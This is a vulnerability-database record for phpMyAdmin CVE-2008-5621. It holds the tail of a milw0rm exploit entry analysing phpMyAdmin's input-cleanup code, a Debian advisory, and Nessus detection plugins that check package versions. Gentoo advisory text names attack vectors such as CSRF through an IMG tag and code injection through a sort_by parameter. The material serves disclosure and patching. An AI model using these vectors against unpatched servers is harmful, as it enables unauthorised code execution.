'bs_reference',\r\n /* rajk - for changing BLOB repository file MIME type */\r\n 'bs_db', 'bs_table', 'bs_ref', 'bs_new_mime_type'\r\n );\r\n /**\r\n * Require cleanup functions\r\n */\r\n require_once './libraries/cleanup.lib.php';\r\n /**\r\n * Do actual cleanup\r\n */\r\n PMA_remove_request_vars($allow_list);\r\n\r\n}\r\n\r\nand PMA_remove_request_vars() is in ./phpmyadmin/libraries/cleanup.lib.php:\r\n\r\nfunction PMA_remove_request_vars(&$whitelist)\r\n{\r\n // do not check only $_REQUEST because it could have been overwritten\r\n // and use type casting because the variables could have become\r\n // strings\r\n $keys = array_keys(array_merge((array)$_REQUEST, 
(array)$_GET,\r\n(array)$_POST, (array)$_COOKIE));\r\n\r\n foreach($keys as $key) {\r\n if (! in_array($key, $whitelist)) {\r\n unset($_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);\r\n } else {\r\n // allowed stuff could be compromised so escape it\r\n // we require it to be a string\r\n if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {\r\n unset($_REQUEST[$key]);\r\n }\r\n if (isset($_POST[$key]) && ! is_string($_POST[$key])) {\r\n unset($_POST[$key]);\r\n }\r\n if (isset($_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {\r\n unset($_COOKIE[$key]);\r\n }\r\n if (isset($_GET[$key]) && ! is_string($_GET[$key])) {\r\n unset($_GET[$key]);\r\n }\r\n }\r\n }\r\n}\r\nAs a note, the & in this function declaration\r\nPMA_remove_request_vars(&$whitelist) means to pass the variable by\r\nreference, however this function doesn't use that variable reference.\r\n Again this is superstitious because it has no effect on the code\r\nitself.\r\n\r\n# milw0rm.com [2008-12-08]\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7382/"}], "debian": [{"lastseen": "2020-08-12T00:51:12", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5621"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1723-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nFebruary 11, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : phpmyadmin\nVulnerability : insufficient input sanitising\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-5621\n\nMichael Brooks discovered that phpMyAdmin, a tool to administrate MySQL\nover the web, performs insufficient input sanitising allowing a user\nassisted remote attacker to execute code on the webserver.\n\nFor the stable distribution (etch), this 
problem has been fixed in version\n2.9.1.1-10.\n\nFor the testing distribution (lenny) and unstable distribution (sid), this\nproblem has been fixed in version 2.11.8.1-5.\n\nWe recommend that you upgrade your phpmyadmin package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.dsc\n Size/MD5 checksum: 1021 9428b84187a0fc1c893e099987f746f6\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1.orig.tar.gz\n Size/MD5 checksum: 3500563 f598509b308bf96aee836eb2338f523c\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.diff.gz\n Size/MD5 checksum: 54951 8441cbf454016d4425dddaef569bbd21\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10_all.deb\n Size/MD5 checksum: 3603132 538d80062d8fc4c009e0e0e01ffbacd4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 8, "modified": "2009-02-11T21:44:32", "published": "2009-02-11T21:44:32", "id": "DEBIAN:DSA-1723-1:67D35", 
"href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00032.html", "title": "[SECURITY] [DSA 1723-1] New phpmyadmin packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:45:17", "description": "Michael Brooks discovered that phpMyAdmin, a tool to administrate\nMySQL over the web, performs insufficient input sanitising allowing a\nuser assisted remote attacker to execute code on the webserver.", "edition": 26, "published": "2009-02-13T00:00:00", "title": "Debian DSA-1723-1 : phpmyadmin - insufficient input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "modified": "2009-02-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:phpmyadmin"], "id": "DEBIAN_DSA-1723.NASL", "href": "https://www.tenable.com/plugins/nessus/35664", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1723. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35664);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_xref(name:\"DSA\", value:\"1723\");\n\n script_name(english:\"Debian DSA-1723-1 : phpmyadmin - insufficient input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Michael Brooks discovered that phpMyAdmin, a tool to administrate\nMySQL over the web, performs insufficient input sanitising allowing a\nuser assisted remote attacker to execute code on the webserver.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1723\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.9.1.1-10.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/11\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"phpmyadmin\", reference:\"2.9.1.1-10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:43:32", "description": "The phpMyAdmin Team reports :\n\nA logged-in user can be subject of SQL injection through cross site\nrequest forgery. 
Several scripts in phpMyAdmin are vulnerable and the\nattack can be made through table parameter.", "edition": 25, "published": "2008-12-12T00:00:00", "title": "FreeBSD : phpmyadmin -- cross-site request forgery vulnerability (54f72962-c7ba-11dd-a721-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "modified": "2008-12-12T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpMyAdmin", "p-cpe:/a:freebsd:freebsd:phpMyAdmin211"], "id": "FREEBSD_PKG_54F72962C7BA11DDA7210030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/35089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35089);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5621\");\n script_xref(name:\"EDB-ID\", value:\"7382\");\n script_xref(name:\"Secunia\", value:\"33076\");\n\n script_name(english:\"FreeBSD : phpmyadmin -- cross-site request forgery vulnerability (54f72962-c7ba-11dd-a721-0030843d3802)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin Team reports :\n\nA logged-in user can be subject of SQL injection through cross site\nrequest forgery. 
Several scripts in phpMyAdmin are vulnerable and the\nattack can be made through table parameter.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2008-10/\"\n );\n # https://vuxml.freebsd.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb7b6843\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin211\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin211<2.11.9.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin<3.1.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:06:21", "description": "Improvements for 3.1.1.0: - [core] Navi panel server links wrong -\n[core] bad session.save_path not detected - [core] Re-login causes PMA\nto forget current table name - [export] do not include view name in\nexport - [display] enable copying of auto increment by default -\n[core] do not bail out creating session on any PHP warning - [display]\nproperly update tooltips in navigation frame - [core] do not use ctype\nif it is not available - [display] HeaderFlipType 'fake' problems -\n[display] Incorrect size for view - [display] Drop-down menu blinking\nin FF - [lang] Catalan update - [lang] Finnish update - [core] Avoid\nerror with BLOBstreaming support requiring SUPER privilege -\n[security] possible CSRF on several pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-12-15T00:00:00", "title": "Fedora 8 : phpMyAdmin-3.1.1-1.fc8 (2008-11221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "modified": "2008-12-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "id": "FEDORA_2008-11221.NASL", "href": "https://www.tenable.com/plugins/nessus/35096", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-11221.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35096);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_xref(name:\"FEDORA\", value:\"2008-11221\");\n\n script_name(english:\"Fedora 8 : phpMyAdmin-3.1.1-1.fc8 (2008-11221)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Improvements for 3.1.1.0: - [core] Navi panel server links wrong -\n[core] bad session.save_path not detected - [core] Re-login causes PMA\nto forget current table name - [export] do not include view name in\nexport - [display] enable copying of auto increment by default -\n[core] do not bail out creating session on any PHP warning - [display]\nproperly update tooltips in navigation frame - [core] do not use ctype\nif it is not available - [display] HeaderFlipType 'fake' problems -\n[display] Incorrect size for view - [display] Drop-down menu blinking\nin FF - [lang] Catalan update - 
[lang] Finnish update - [core] Avoid\nerror with BLOBstreaming support requiring SUPER privilege -\n[security] possible CSRF on several pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=475954\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-December/017694.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d04cff9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"phpMyAdmin-3.1.1-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:29", "description": "The remote host is affected by the vulnerability described in GLSA-200903-32\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been reported in phpMyAdmin:\n libraries/database_interface.lib.php in phpMyAdmin allows remote\n authenticated users to execute arbitrary code via a request to\n server_databases.php with a sort_by parameter containing PHP 
sequences,\n which are processed by create_function (CVE-2008-4096).\n Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote\n attackers to inject arbitrary web script or HTML via the db parameter,\n a different vector than CVE-2006-6942 and CVE-2007-5977\n (CVE-2008-4775).\n Cross-site request forgery (CSRF) vulnerability in phpMyAdmin allows\n remote authenticated attackers to perform unauthorized actions as the\n administrator via a link or IMG tag to tbl_structure.php with a\n modified table parameter. NOTE: this can be leveraged to conduct SQL\n injection attacks and execute arbitrary code (CVE-2008-5621).\n Multiple cross-site request forgery (CSRF) vulnerabilities in\n phpMyAdmin allow remote attackers to conduct SQL injection attacks via\n unknown vectors related to the table parameter, a different vector than\n CVE-2008-5621 (CVE-2008-5622).\n \nImpact :\n\n A remote attacker may execute arbitrary code with the rights of the\n webserver, inject and execute SQL with the rights of phpMyAdmin or\n conduct XSS attacks against other users.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2009-03-19T00:00:00", "title": "GLSA-200903-32 : phpMyAdmin: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5977", "CVE-2008-5622", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "modified": "2009-03-19T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:phpmyadmin"], "id": "GENTOO_GLSA-200903-32.NASL", "href": "https://www.tenable.com/plugins/nessus/35964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-32.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35964);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-6942\", \"CVE-2007-5977\", \"CVE-2008-4096\", \"CVE-2008-4775\", \"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_xref(name:\"GLSA\", value:\"200903-32\");\n\n script_name(english:\"GLSA-200903-32 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-32\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been reported in phpMyAdmin:\n libraries/database_interface.lib.php in phpMyAdmin allows remote\n authenticated users to execute arbitrary code via a request to\n server_databases.php with a sort_by parameter containing PHP sequences,\n which are processed by create_function (CVE-2008-4096).\n Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote\n attackers to inject arbitrary web script or HTML via the db parameter,\n a different vector than CVE-2006-6942 and CVE-2007-5977\n (CVE-2008-4775).\n Cross-site request forgery (CSRF) vulnerability in phpMyAdmin allows\n remote authenticated attackers to perform unauthorized actions as the\n administrator via a link or IMG tag to tbl_structure.php with a\n modified table parameter. 
NOTE: this can be leveraged to conduct SQL\n injection attacks and execute arbitrary code (CVE-2008-5621).\n Multiple cross-site request forgery (CSRF) vulnerabilities in\n phpMyAdmin allow remote attackers to conduct SQL injection attacks via\n unknown vectors related to the table parameter, a different vector than\n CVE-2008-5621 (CVE-2008-5622).\n \nImpact :\n\n A remote attacker may execute arbitrary code with the rights of the\n webserver, inject and execute SQL with the rights of phpMyAdmin or\n conduct XSS attacks against other users.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-32\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.11.9.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 79, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 2.11.9.4\"), vulnerable:make_list(\"lt 2.11.9.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:55", "description": "This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. 
(CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)", "edition": 24, "published": "2009-01-22T00:00:00", "title": "openSUSE 10 Security Update : phpMyAdmin (phpMyAdmin-5935)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3197", "CVE-2008-1924", "CVE-2008-2960", "CVE-2008-5622", "CVE-2008-4326", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-4096", "CVE-2008-5621"], "modified": "2009-01-22T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "SUSE_PHPMYADMIN-5935.NASL", "href": "https://www.tenable.com/plugins/nessus/35449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update phpMyAdmin-5935.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35449);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1149\", \"CVE-2008-1567\", \"CVE-2008-1924\", \"CVE-2008-2960\", \"CVE-2008-3197\", \"CVE-2008-4096\", \"CVE-2008-4326\", \"CVE-2008-5621\");\n\n script_name(english:\"openSUSE 10 Security Update : phpMyAdmin (phpMyAdmin-5935)\");\n script_summary(english:\"Check for the phpMyAdmin-5935 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. 
